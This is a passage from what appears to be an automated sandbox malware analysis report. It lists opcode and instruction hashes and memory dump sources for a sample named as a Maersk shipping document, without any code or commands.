                                                    • Opcode Fuzzy Hash: 33e6dcc19136cae27b02779c547435b2b506ffca41f8931eb2d07bdfdeb88659
                                                    • Instruction Fuzzy Hash: 0D419531A002299FDB31DF68C944BEAF7B4EF45740F4105A9EA08AB395DB749E80CF91
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                    • Instruction ID: 12f32ef8132d3c450727c3a69d2b3e366a85322d3bb34ca1b0b529aec9992ba0
                                                    • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                    • Instruction Fuzzy Hash: F0417275B10309ABEB15DF99CC94AAFBBBEAF89710F144069E908E7341DA74DF018760
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37a551ab21febd16ab2feba4a78f3812330f1b67795cb03c6b8c50ccd9202f7e
                                                    • Instruction ID: 197f4375a2c1390a24900049efb03bbb17eed8ea1861d10ceae83fde0f43d688
                                                    • Opcode Fuzzy Hash: 37a551ab21febd16ab2feba4a78f3812330f1b67795cb03c6b8c50ccd9202f7e
                                                    • Instruction Fuzzy Hash: 3641BFB16007029FE325CF28C484A26FBF9FF88314B544A6DF54686A51E730F855CB90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 79c17c9d6e715a0bb8c676d6b73085087eb79479ab4752167b846be43425c9e2
                                                    • Instruction ID: 553922feab5e35d9449d2c9ec04991d7b321c7b74d6e85cc3913e4f93917dfa3
                                                    • Opcode Fuzzy Hash: 79c17c9d6e715a0bb8c676d6b73085087eb79479ab4752167b846be43425c9e2
                                                    • Instruction Fuzzy Hash: EA41C132940609CFDB21CF68E9887EEFBB0BB18716F18459DD411B7285EB349A41CF50
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4619f44da580e149e81190b7114e8f331147289ce47c8ac52267c2c71b2a85d3
                                                    • Instruction ID: 52d846590ed7a167d245a2fe7245f2177cee34381c5b6116fece8f4cab8b37bd
                                                    • Opcode Fuzzy Hash: 4619f44da580e149e81190b7114e8f331147289ce47c8ac52267c2c71b2a85d3
                                                    • Instruction Fuzzy Hash: AD414532900206CFD725DF48C988B6AFBB2FBD8700F59826ED5019B259C374DA42CF91
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 210b3dc8de4cdb51e659ef430fdc395bf41f4bda0c0fed59bb3547b49d27d264
                                                    • Instruction ID: 768579a09b27f443fa7f0a90a15771ec5643daa44cd94286f85839d0678317e5
                                                    • Opcode Fuzzy Hash: 210b3dc8de4cdb51e659ef430fdc395bf41f4bda0c0fed59bb3547b49d27d264
                                                    • Instruction Fuzzy Hash: E3416F325083069ED712DF65D840A6BF7E9EF89B54F40092EFA94D7250E731DE488BA3
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                    • Instruction ID: f17dc9f30ac5f6195093cd64b1693ff7227445f12aacc4205c180b4fd469862b
                                                    • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                    • Instruction Fuzzy Hash: F1212D3660075666CF15AB99C844EBAFFB8EF40714F40841AFE95CB591E734DA40C761
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a343fd97bde3c866fb79c6f5699296084139490d5097401ccde55732a0bf75ac
                                                    • Instruction ID: 1a9a50f867323c214781afc0847934e7ef8d36f76404b36a961eb5da3c98240f
                                                    • Opcode Fuzzy Hash: a343fd97bde3c866fb79c6f5699296084139490d5097401ccde55732a0bf75ac
                                                    • Instruction Fuzzy Hash: BB31D431A0152CABDF31DB18DC85FEEF7B9AB15740F0101A1F645A72A0DA74AE848F90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                    • Instruction ID: dfd08e9f4ae59979ec7868df03b0cdf58cbd20c2858de5497defdde3b054ae27
                                                    • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                    • Instruction Fuzzy Hash: A3216D72A00609EBCB15CF58C984A8AFBB5FF48714F108069EE179B685D671EA058B90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b5fb45270eb66ee9cbc363da760ad45e27bc11fa5302e793df8acd74147295a
                                                    • Instruction ID: a0e2ccb127f626f976b24aad3cc4268fca4573e05aba4480e924ab77b60dafee
                                                    • Opcode Fuzzy Hash: 9b5fb45270eb66ee9cbc363da760ad45e27bc11fa5302e793df8acd74147295a
                                                    • Instruction Fuzzy Hash: 5821C3726047499BCB21CF18C880B6BB7F4FF88760F504529FD569BA45D730EA008FA2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                    • Instruction ID: fdaba4b0ef3c2a31809c702bbb1134f3321a418fafaad3c3a0d6abfc19f7ab67
                                                    • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                    • Instruction Fuzzy Hash: 97318931600605EFEB21CFA8D884F6AB7F9EF45354F1445A9E652CB290EB30EE45CB50
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 004a2478b737d71d914090d391e6c41b728a2a984acb56b740d6b8547539bd05
                                                    • Instruction ID: 0633480eed3b87be57a8ef2646822a9e7b6172851f0a8fb7400e27ee3dac900a
                                                    • Opcode Fuzzy Hash: 004a2478b737d71d914090d391e6c41b728a2a984acb56b740d6b8547539bd05
                                                    • Instruction Fuzzy Hash: E6316B76A00205DFCB19CF18C884DAEB7B9EF84304F554859EC09DB399E731AA40CB90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e87bee8b69e933480e1eab99e68de6a00a5de489fe846fe563251e69cda3f6f0
                                                    • Instruction ID: 4bcea0d2e0ba3e1b5dadd6ff4287a8ecb4a35dd63ce594c271a5263dc70a3478
                                                    • Opcode Fuzzy Hash: e87bee8b69e933480e1eab99e68de6a00a5de489fe846fe563251e69cda3f6f0
                                                    • Instruction Fuzzy Hash: F1217C71900229AFCF21DF59C881ABEB7F4FF48740B544069F941EB254D739AE42CBA1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9bccb90fd115743a2d0cd4c1be52982a8400b2b84b73c089ca59c510ccedabc2
                                                    • Instruction ID: 5984efb8ce823a05a072f01376a4ba4551097698713b0813607efc50080ede6c
                                                    • Opcode Fuzzy Hash: 9bccb90fd115743a2d0cd4c1be52982a8400b2b84b73c089ca59c510ccedabc2
                                                    • Instruction Fuzzy Hash: B2218B71600655AFD716DB68C884F6AB7A8FF48740F14006AF944DB6A1D734EE80CB68
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac17a7efe734335b2f588e5d16486c2e8178821772f50bf3c01dbb553d973b3f
                                                    • Instruction ID: f27bc3d32595e2d2a28f2afdfe7bd477ab87e2203f4179c5a27d0cc761d63a4c
                                                    • Opcode Fuzzy Hash: ac17a7efe734335b2f588e5d16486c2e8178821772f50bf3c01dbb553d973b3f
                                                    • Instruction Fuzzy Hash: 1721C1725042569FD712DF59C888B9BFBECEF95740F08045AFD80C7251D730CA84C6A2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 64b7fd431aa13bef9a2c239d72247e57f36de967e091525d4f1e205a88232335
                                                    • Instruction ID: 6abd9ae981982575b3e2aa8edd59aa3f3dce5ea437b666cecfcc2bbf6956d152
                                                    • Opcode Fuzzy Hash: 64b7fd431aa13bef9a2c239d72247e57f36de967e091525d4f1e205a88232335
                                                    • Instruction Fuzzy Hash: D12107316457859BF327672CCD48B25BBD4AF41F64F1803A8FA20DB6E2D768C9818210
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3657cd1bfad9a172248a19f73b8d4b13ccae794f6a488d2f1e0cf6b3f2c8ec38
                                                    • Instruction ID: 552b5d4620c05023ef3f69004a553e63fb0f690bdb8ee32e6edc24b90431ce9a
                                                    • Opcode Fuzzy Hash: 3657cd1bfad9a172248a19f73b8d4b13ccae794f6a488d2f1e0cf6b3f2c8ec38
                                                    • Instruction Fuzzy Hash: 9F21AC352007019FCB25DF29C940B46B7F6BF08704F248468A549CB765E771E942CB94
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a1196dad2aa46e8144d7a9a7bc2cf82e262eeb4ee47bea4c1604a058926d8c7d
                                                    • Instruction ID: 3f1e1a35733c18ab4b483043ec73ccc482a82168fb58c75609fadfe6d8a29c5f
                                                    • Opcode Fuzzy Hash: a1196dad2aa46e8144d7a9a7bc2cf82e262eeb4ee47bea4c1604a058926d8c7d
                                                    • Instruction Fuzzy Hash: AA115C36380A11BFD36659989CC4F27BA99DBD4B74F504229BF08CB281DB70DD008796
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7997263e3c2392f80933070bfba970d32d44c4261598425adeaa481e3fb3dc18
                                                    • Instruction ID: 0924343abb96f985c46ba5bf48877c3759afe74fc596101afc524fc73cfc05da
                                                    • Opcode Fuzzy Hash: 7997263e3c2392f80933070bfba970d32d44c4261598425adeaa481e3fb3dc18
                                                    • Instruction Fuzzy Hash: 3021F8B1E40219ABCB20DFAAD8849AEFBF8BF98700F10012EE405E7344D6709A45CB50
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                    • Instruction ID: ff8d70cd646917cf6ee1185738f36bef9aa65b75f2d9fb5fa91b014927f00e1b
                                                    • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                    • Instruction Fuzzy Hash: 7F218C72A0020AEFDF129F98CC44BAEBBB9EF89310F244819F910E7251D774DA509B90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                    • Instruction ID: d992f811f32bb983c7f5ee8c6cb4a2d109a4167cb2e645ea79b87a998cabbf5b
                                                    • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                    • Instruction Fuzzy Hash: 6B11E273600609AFE7229F54CC45F9EFBB8EB84754F100029F6018B190D672ED44CB64
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 58b770ea2dc71fbecaf7d26692060e699379a28c50fcc30b86cb58643650cc02
                                                    • Instruction ID: 5a1c265ffd25aa779b5c734ac5cdc5a53b01f6367edb5793570bfc85b81d5e71
                                                    • Opcode Fuzzy Hash: 58b770ea2dc71fbecaf7d26692060e699379a28c50fcc30b86cb58643650cc02
                                                    • Instruction Fuzzy Hash: 67119032701615DB9B11CF9DC4C0A16FFE9AFCA711B98416AEE089F204D6B2D9118791
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                    • Instruction ID: 0fb1524017bcf1c4bb1fecaee70bb5ef9db69bfa598361b54ad54413840bab91
                                                    • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                    • Instruction Fuzzy Hash: A9217972600649DFDB218F49C544A66FBF6FB94B10F14887DE58A8BA54C770ED02CB80
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9169da2b786d96ba240a814bee562e8e2c29275e5f9c8ce0f5c6b088c385403
                                                    • Instruction ID: 4fb73aba76d46881805537ac3f25cf009ff28373f4eecc795164f883cc7f2bb5
                                                    • Opcode Fuzzy Hash: f9169da2b786d96ba240a814bee562e8e2c29275e5f9c8ce0f5c6b088c385403
                                                    • Instruction Fuzzy Hash: F9214C75A00205DFCB15CF58C581AAAFBB6FB88315F6442ADD105AB311D771AD06CB91
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 25aa0951a4f9bd1ed696340aa30a2b16cdf011858b9cddfccf982191392153d4
                                                    • Instruction ID: 5696aa924f7416a3db8325fffd797b4804f32f4a34fcdb6d4f3c052845fe1f93
                                                    • Opcode Fuzzy Hash: 25aa0951a4f9bd1ed696340aa30a2b16cdf011858b9cddfccf982191392153d4
                                                    • Instruction Fuzzy Hash: D9216A71600A04EFD7218F68C881B66B7F8FF44360F04882DE5AAC7250EB30E940CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6118c4d9eeb15bf07532686454d328363cf8459e6d6758eaadf26db97d4dbd2f
                                                    • Instruction ID: aae7b4e27218d3abae8fb88d651a116adfc8469dad634b6cdee04aaf1deeccd6
                                                    • Opcode Fuzzy Hash: 6118c4d9eeb15bf07532686454d328363cf8459e6d6758eaadf26db97d4dbd2f
                                                    • Instruction Fuzzy Hash: 2D114C333001146FCF1ACB28CC85A6FB656EBD5770B38852CDA22CB280ED309902C291
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7aedb95b008ea8853bda72227499be9dc2c784074289fd22726699717438cf45
                                                    • Instruction ID: 6f4ca2958abb3706040e120445e54450ee9641580887091e798d352a8e1751fb
                                                    • Opcode Fuzzy Hash: 7aedb95b008ea8853bda72227499be9dc2c784074289fd22726699717438cf45
                                                    • Instruction Fuzzy Hash: F3119172240518FFD722DB5DC940F9AB7A8EF99B54F254029F605DB251EA70EB01C7E0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1efefef3b3fc72acc0d7a189b618e9b36a4095e88b30bbc022b16be4f2257d6
                                                    • Instruction ID: 409dd1cc7159b2c15427f9f127fe6a33f465f6cc5990f0baf712a3ac10790cff
                                                    • Opcode Fuzzy Hash: c1efefef3b3fc72acc0d7a189b618e9b36a4095e88b30bbc022b16be4f2257d6
                                                    • Instruction Fuzzy Hash: CF11EF72A0120DABCB25CF59D480E4AFBF4EF84260B168079E9059B315F734DD00CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                    • Instruction ID: f225f10c1fc7f5f584635039b8f238937ecb2e4c06cec27f1c4c44c84564a435
                                                    • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                    • Instruction Fuzzy Hash: 9711B236A00919AFDB19CB58C805B9DFBB9EF84310F158269EC55E7344E671AE51CB80
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                    • Instruction ID: 46f822328066f7db77f847d91c50ef2cf84011ce4c7689e058745a808a8ea766
                                                    • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                    • Instruction Fuzzy Hash: 8A2106B5A00B059FD3A0CF29C580B52BBF4FB48B10F50492EE98AC7B40E371E814CB90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                    • Instruction ID: 75b0db9464aee5bbcb2bb341bf9762af9a4dda8751ede2e35daa7199bdd5d045
                                                    • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                    • Instruction Fuzzy Hash: FC110631600614EFE7229F48C844B56BBE5EF45754F068428EA88DB160D7B0DEC0D794
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5dcfdd39645009fbd8b135db512d53d89fe68bd3e2a74db41eae35d6d9d9780
                                                    • Instruction ID: b4b1cac34dfd26f9cda7d48be380f305c7ac192395a52f39cc581efe9407dd70
                                                    • Opcode Fuzzy Hash: b5dcfdd39645009fbd8b135db512d53d89fe68bd3e2a74db41eae35d6d9d9780
                                                    • Instruction Fuzzy Hash: 8C01D631785649ABE32BA66DDC98F67BBDCEF81B54F0500A9F901CB292DA24DD00C261
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cecfbc0047f59db2a4cee2e03a540ff29cb78a8b6955fd05e339611efc3a3142
                                                    • Instruction ID: 301d3cd5f4c28c3fd3a11f300c2091d0e962781102880c20a05d05abdbebb7db
                                                    • Opcode Fuzzy Hash: cecfbc0047f59db2a4cee2e03a540ff29cb78a8b6955fd05e339611efc3a3142
                                                    • Instruction Fuzzy Hash: 1C11C276200685EFDB26CF5DD844F56BFA8EBC5764F584219F9068B260C3B2E800CF60
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 12a6c7bcf3ec16d9c4198b262c8f116f837762f9ad9c86d2ad5dce1dd6c58b73
                                                    • Instruction ID: 1fb4abc0caf15eefd3a9a13826704ad4a2d002e6c067b3cd41becada0f4262c4
                                                    • Opcode Fuzzy Hash: 12a6c7bcf3ec16d9c4198b262c8f116f837762f9ad9c86d2ad5dce1dd6c58b73
                                                    • Instruction Fuzzy Hash: 6511C6362006119FD7229AADD844F76B7A5FFC5710F194429E642C7654DB30EE42CB91
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3dcbe65fc6da603f451049c42dca8622ced3cb00d7f63cb102652fbce4921f83
                                                    • Instruction ID: 7a5a9b1cf1493c7cf68c07f2dbc988f609b7e0494bc818614ca7178aa85d079d
                                                    • Opcode Fuzzy Hash: 3dcbe65fc6da603f451049c42dca8622ced3cb00d7f63cb102652fbce4921f83
                                                    • Instruction Fuzzy Hash: 5411C472A00719ABDB22DF99C9C0B5EFBB8FF84750F540459EA01A7244D730EE41CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: afc0cfa68ae391390003ab5cc770bda80652b482e32006e17c5e7a193abded47
                                                    • Instruction ID: cdf9a0e13d13f5be9b909938910a04b860436d6c929404080bc8ad1371b12c00
